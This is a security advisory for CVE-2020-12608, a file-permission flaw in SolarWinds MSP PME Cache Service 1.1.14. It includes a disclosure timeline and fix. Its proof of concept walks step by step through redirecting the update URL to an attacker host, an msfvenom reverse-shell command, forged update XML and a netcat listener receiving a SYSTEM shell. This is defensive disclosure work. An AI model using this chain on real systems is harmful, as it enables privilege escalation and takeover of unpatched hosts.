166 lines
No EOL
6 KiB
Text
166 lines
No EOL
6 KiB
Text
# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
|
|
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
|
|
# Date: 2020-05-06
|
|
# Vendor: https://www.solarwindsmsp.com/
|
|
# CVE: CVE-2020-12608
|
|
# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
|
|
# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
|
|
# CWE: 276
|
|
|
|
Vulnerable version
|
|
==================
|
|
SolarWinds MSP PME (Patch Management Engine) before 1.1.15
|
|
|
|
Timeline
|
|
========
|
|
2020-04-24 Vulnerability discovered
|
|
2020-04-27 Send details to SolarWinds PSIRT
|
|
2020-04-27 SolarWinds confirmed the vulnerability
|
|
2020-05-05 SolarWinds released PME version 1.1.15
|
|
2020-05-06 Public disclosure
|
|
|
|
Description
|
|
===========
|
|
An error with insecure file permissions has occurred in the SolarWinds
|
|
MSP Cache Service, which is part of the Advanced Monitoring Agent and
|
|
can lead to code execution. The SolarWinds MSP Cache Service is
|
|
typically used to get new update definition files and versions for
|
|
ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
|
|
XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
|
|
MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
|
|
that the parameter SISServerURL can be changed, which controls the
|
|
location of the updates. After some analysis, we were able to provide
|
|
modified XML files (PMESetup_details.xml and
|
|
ThirdPartyPatch_details.xml) that point to an executable file with a
|
|
reverse TCP payload using our controlled SISServerURL web server for
|
|
SolarWinds MSP Cache Service.
|
|
|
|
Proof of Concept (PoC)
|
|
======================
|
|
As we can see, NTFS change permissions are set to CacheService.xml by
|
|
default. Any user on the system who is in group users can change the
|
|
file content. This is especially a big problem on terminal servers or
|
|
multi-user systems.
|
|
|
|
PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
|
|
icacls .\CacheService.xml
|
|
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
|
|
NT-AUTORITÄT\SYSTEM:(I)(F)
|
|
VORDEFINIERT\Administratoren:(I)(F)
|
|
|
|
1. Modify CacheService.xml
|
|
|
|
In the xml file, the parameter SISServerURL was adjusted, which now
|
|
points to a web server controlled by the attacker.
|
|
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
<Configuration>
|
|
<CachingEnabled>True</CachingEnabled>
|
|
<ApplianceVersion>1.1.14.2223</ApplianceVersion>
|
|
<CacheLocation>C:\ProgramData\SolarWinds
|
|
MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
|
|
<CacheSizeInMB>10240</CacheSizeInMB>
|
|
<SISServerURL>https://evil-attacker.example.org</SISServerURL>
|
|
<LogLevel>5</LogLevel>
|
|
<Proxy></Proxy>
|
|
<ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
|
|
<ProxyCacheService />
|
|
<CacheFilesDeleted></CacheFilesDeleted>
|
|
<CacheDeletedInBytes></CacheDeletedInBytes>
|
|
<HostApplication>RMM</HostApplication>
|
|
<CanBypassProxyCacheService>True</CanBypassProxyCacheService>
|
|
<BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
|
|
<ComponentUpdateMinutes>300</ComponentUpdateMinutes>
|
|
<ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
|
|
</Configuration>
|
|
|
|
2. Payload creation
|
|
|
|
Generate an executable file, for example using msfvenom, that
|
|
establishes a reverse tcp connection to the attacker and store it on the
|
|
web server.
|
|
|
|
msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
|
|
exe > /tmp/solarwinds-shell.exe
|
|
|
|
3. Prepare web server
|
|
|
|
Place the modified xml files (PMESetup_details.xml or
|
|
ThirdPartyPatch_details.xml) on the web server in the path
|
|
/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
|
|
executable, set correct values for SizeInBytes and increase the version.
|
|
|
|
Example of PMESetup_details.xml
|
|
|
|
<ComponentDetails>
|
|
<Name>Patch Management Engine</Name>
|
|
<Description>Patch Management Engine</Description>
|
|
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
|
|
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
|
|
<SHA256Checksum>
|
|
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
|
|
</SHA256Checksum>
|
|
<SizeInBytes>7168</SizeInBytes>
|
|
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
|
|
<FileName>solarwinds-shell.exe</FileName>
|
|
<Architecture>x86,x64</Architecture>
|
|
<Locale>all</Locale>
|
|
<Version>1.1.14.2224</Version>
|
|
</ComponentDetails>
|
|
|
|
Example of ThirdPartyPatch_details.xml
|
|
|
|
<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
|
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
|
<Name>Third Party Patch</Name>
|
|
<Description>
|
|
Third Party Patch application for Patch Management Engine RMM v 1 and later
|
|
</Description>
|
|
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
|
|
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
|
|
<SHA256Checksum>
|
|
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
|
|
</SHA256Checksum>
|
|
<SizeInBytes>7168</SizeInBytes>
|
|
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
|
|
<FileName>solarwinds-shell.exe</FileName>
|
|
<Architecture>x86,x64</Architecture>
|
|
<Locale>all</Locale>
|
|
<Version>1.2.1.95</Version>
|
|
</ComponentDetails>
|
|
|
|
4. Malicious executable download
|
|
|
|
After restarting the system or reloading the CacheService.xml, the
|
|
service connects to the web server controlled by the attacker and
|
|
downloads the executable file. This is then stored in the path
|
|
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
|
|
%PROGRAMDATA%\SolarWinds MSP\PME\archives\.
|
|
|
|
[24/Apr/2020:10:57:01 +0200] "HEAD
|
|
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
|
|
[24/Apr/2020:10:57:01 +0200] "GET
|
|
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
|
|
|
|
5. Getting shell
|
|
|
|
After a certain time the executable file is executed by SolarWinds MSP
|
|
RPC Server service and establishes a connection with the rights of the
|
|
system user to the attacker.
|
|
|
|
[~]: nc -nlvp 4444
|
|
Listening on [0.0.0.0] (family 0, port 4444)
|
|
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
|
|
Microsoft Windows [Version 10.0.18363.778]
|
|
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
|
|
|
|
C:\WINDOWS\system32>whoami
|
|
whoami
|
|
nt-authority\system
|
|
|
|
C:\WINDOWS\system32>
|
|
|
|
Fix
|
|
===
|
|
There is a new PME version 1.1.15 which comes with auto-update
|
|
https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/ |